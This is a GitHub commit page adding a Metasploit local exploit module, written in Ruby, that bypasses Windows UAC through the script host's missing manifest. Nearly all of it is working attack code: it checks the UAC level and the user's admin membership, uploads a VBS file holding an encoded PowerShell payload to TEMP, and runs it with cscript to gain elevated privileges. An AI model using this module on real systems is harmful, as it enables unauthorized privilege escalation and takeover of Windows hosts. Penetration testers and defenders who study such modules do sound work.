Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Initial working scripthost bypass uac
- Loading branch information
1 parent
129edd8
commit 228087d
Showing
2 changed files
with
145 additions
and
39 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,141 @@ | ||
## | ||
# This module requires Metasploit: http://metasploit.com/download | ||
# Current source: https://github.com/rapid7/metasploit-framework | ||
## | ||
|
||
require 'msf/core' | ||
|
||
class Metasploit3 < Msf::Exploit::Local | ||
Rank = ExcellentRanking | ||
|
||
include Exploit::FileDropper | ||
include Exploit::Powershell | ||
include Post::File | ||
include Post::Windows::Priv | ||
include Post::Windows::Runas | ||
|
||
def initialize(info={}) | ||
super( update_info( info, | ||
'Name' => 'Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability)', | ||
'Description' => %q{ | ||
This module will bypass Windows UAC by utilizing the missing .manifest on the script host | ||
cscript/wscript.exe binaries. | ||
}, | ||
'License' => MSF_LICENSE, | ||
'Author' => [ | ||
'Vozzie', | ||
'Ben Campbell' | ||
], | ||
'Platform' => [ 'win' ], | ||
'SessionTypes' => [ 'meterpreter' ], | ||
'Targets' => [ | ||
[ 'Windows x86', { 'Arch' => ARCH_X86 } ], | ||
[ 'Windows x64', { 'Arch' => ARCH_X86_64 } ] | ||
], | ||
'DefaultTarget' => 0, | ||
'References' => [ | ||
[ | ||
'URL', 'http://seclist.us/uac-bypass-vulnerability-in-the-windows-script-host.html', | ||
'URL', 'https://github.com/Vozzie/uacscript' | ||
] | ||
], | ||
'DisclosureDate'=> 'Aug 22 2015' | ||
)) | ||
|
||
end | ||
|
||
def exploit | ||
# Validate that we can actually do things before we bother | ||
# doing any more work | ||
validate_environment! | ||
check_permissions! | ||
|
||
# get all required environment variables in one shot instead. This | ||
# is a better approach because we don't constantly make calls through | ||
# the session to get the variables. | ||
env_vars = get_envs('TEMP', 'WINDIR') | ||
|
||
case get_uac_level | ||
when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP, | ||
UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP, | ||
UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT | ||
fail_with(Failure::NotVulnerable, | ||
"UAC is set to 'Always Notify'\r\nThis module does not bypass this setting, exiting..." | ||
) | ||
when UAC_DEFAULT | ||
print_good('UAC is set to Default') | ||
print_good('BypassUAC can bypass this setting, continuing...') | ||
when UAC_NO_PROMPT | ||
print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead') | ||
shell_execute_exe | ||
return | ||
end | ||
|
||
vbs_filepath = "#{env_vars['TEMP']}\\#{rand_text_alpha(8)}.vbs" | ||
|
||
upload_vbs(vbs_filepath) | ||
|
||
cmd_exec("cscript.exe //B #{vbs_filepath}") | ||
end | ||
|
||
def check_permissions! | ||
# Check if you are an admin | ||
vprint_status('Checking admin status...') | ||
admin_group = is_in_admin_group? | ||
|
||
if admin_group.nil? | ||
print_error('Either whoami is not there or failed to execute') | ||
print_error('Continuing under assumption you already checked...') | ||
else | ||
if admin_group | ||
print_good('Part of Administrators group! Continuing...') | ||
else | ||
fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module') | ||
end | ||
end | ||
|
||
if get_integrity_level == INTEGRITY_LEVEL_SID[:low] | ||
fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level') | ||
end | ||
end | ||
|
||
def upload_vbs(payload_filepath) | ||
vbs = File.read(File.join(Msf::Config.data_directory, | ||
'exploits', | ||
'scripthost_uac_bypass', | ||
'bypass.vbs')) | ||
|
||
command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true) | ||
|
||
vbs.gsub!('COMMAND', command) | ||
print_status('Uploading the Payload VBS to the filesystem...') | ||
begin | ||
vprint_status("Payload VBS #{vbs.length} bytes long being uploaded..") | ||
write_file(payload_filepath, vbs) | ||
register_file_for_cleanup(payload_filepath) | ||
rescue Rex::Post::Meterpreter::RequestError => e | ||
fail_with(Failure::Unknown, "Error uploading file #{payload_filepath}: #{e.class} #{e}") | ||
end | ||
end | ||
|
||
def validate_environment! | ||
fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system? | ||
|
||
winver = sysinfo['OS'] | ||
|
||
case winver | ||
when /Windows (7|8|2008|2012)/ | ||
print_good("#{winver} may be vulnerable.") | ||
else | ||
fail_with(Failure::NotVulnerable, "#{winver} is not vulnerable.") | ||
end | ||
|
||
if is_uac_enabled? | ||
print_status('UAC is Enabled, checking level...') | ||
else | ||
unless is_in_admin_group? | ||
fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module') | ||
end | ||
end | ||
end | ||
end |